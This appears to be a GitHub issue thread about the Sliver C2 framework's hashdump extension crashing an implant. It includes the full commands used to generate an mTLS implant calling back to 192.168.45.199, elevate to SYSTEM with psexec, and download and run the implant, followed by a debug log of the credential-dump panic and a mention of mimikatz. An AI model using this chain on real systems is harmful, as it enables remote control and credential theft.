hashdump disconnect session #1647
Comments
Does this also happen in debug mode? If so, can you share the output of the implant?
Session implant generated with:
generate --mtls 192.168.45.199:443 -Z r -e -f exe -o windows -a amd64 -s /tmp/test.exe -d
Connecting through RDP to the machine in order to see the debug output. Launching an elevated terminal with:
.\psexec.exe -accepteula -S -I -D powershell.exe
Then, downloading the
irm 192.168.45.199/test.exe -o test.exe
Executing it, doing the
PS C:\Windows\system32> .\test.exe
2024/05/01 02:20:52 sliver.go:97: Hello my name is ANXIOUS_PRIZE
2024/05/01 02:20:52 limits.go:58: Limit checks completed
2024/05/01 02:20:52 sliver.go:115: Running in session mode
2024/05/01 02:20:52 session.go:69: Starting interactive session connection loop ...
2024/05/01 02:20:52 transports.go:41: Starting c2 url generator (r) ...
2024/05/01 02:20:52 transports.go:104: Return generator: (chan *url.URL)(0xc0000607e0)
2024/05/01 02:20:52 transports.go:92: Yield c2 uri = 'mtls://192.168.45.199:443'
2024/05/01 02:20:52 transports.go:92: Yield c2 uri = 'mtls://192.168.45.199:443'
2024/05/01 02:20:52 session.go:86: Next CC = mtls://192.168.45.199:443
2024/05/01 02:20:52 session.go:86: Next CC = mtls://192.168.45.199:443
2024/05/01 02:20:52 transports.go:92: Yield c2 uri = 'mtls://192.168.45.199:443'
2024/05/01 02:20:52 session.go:176: Connecting -> 192.168.45.199:443
2024/05/01 02:20:52 sliver.go:296: Host Uuid: e19c1e42-ee8e-69c1-b6eb-402f7bee1d5d
2024/05/01 02:20:52 tun-handlers.go:45: [tunnel] Tunnel handlers map[20:0x7d0380 22:0x7cdda0 23:0x7ccf80 80:0x7ce940 82:0x7d1f80]
2024/05/01 02:21:25 sliver.go:206: [recv] sysHandler 100
2024/05/01 02:21:49 sliver.go:206: [recv] sysHandler 92
2024/05/01 02:21:49 sliver.go:206: [recv] sysHandler 90
2024/05/01 02:21:49 sliver.go:206: [recv] sysHandler 91
2024/05/01 02:21:49 extension_windows.go:113: Calling Hashdump, arguments addr: 0x00000000, args size: 00000000
panic: runtime error: index out of range [0] with length 0
goroutine 17 [running, locked to thread]:
github.com/lesnuages/gosecretsdump/pkg/samreader.SamReader.Dump({0x0, {0x1c00000a1b0, 0x10, 0x10}, 0x1, {0x0, 0x0}, {0x0, 0x0}, {0x0, ...}, ...})
/home/runner/go/pkg/mod/github.com/lesnuages/gosecretsdump@v0.0.0-20230809175616-09e41f9c5008/pkg/samreader/samreader.go:314 +0x5b0
github.com/sliverarmory/secretsdump/pkg/hashdump.Hashdump()
/home/runner/work/hashdump/hashdump/pkg/hashdump/hashdump.go:27 +0x1d8
main.Hashdump(0x1c000052000?, 0x0?, 0x393bb0001?)
/home/runner/work/hashdump/hashdump/dll/main.go:28 +0x18
I do not know why it failed to dump the hashes here, but could you maybe at least add a try catch for index out of range to keep the implant from going away?
Looks like an easy fix.
Closing since it's not a bug in Sliver. Follow up here.
Using:
[*] Client v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df - linux/amd64 Compiled at 2024-02-28 20:46:53 +0100 CET Compiled with go version go1.20.7 linux/amd64
I have the following issue:
After that, the sliver client is hanging until timeout and the session is totally dead. Any idea about the root cause?
I can drop mimikatz on the target machine and dump the SAM by myself without any problem.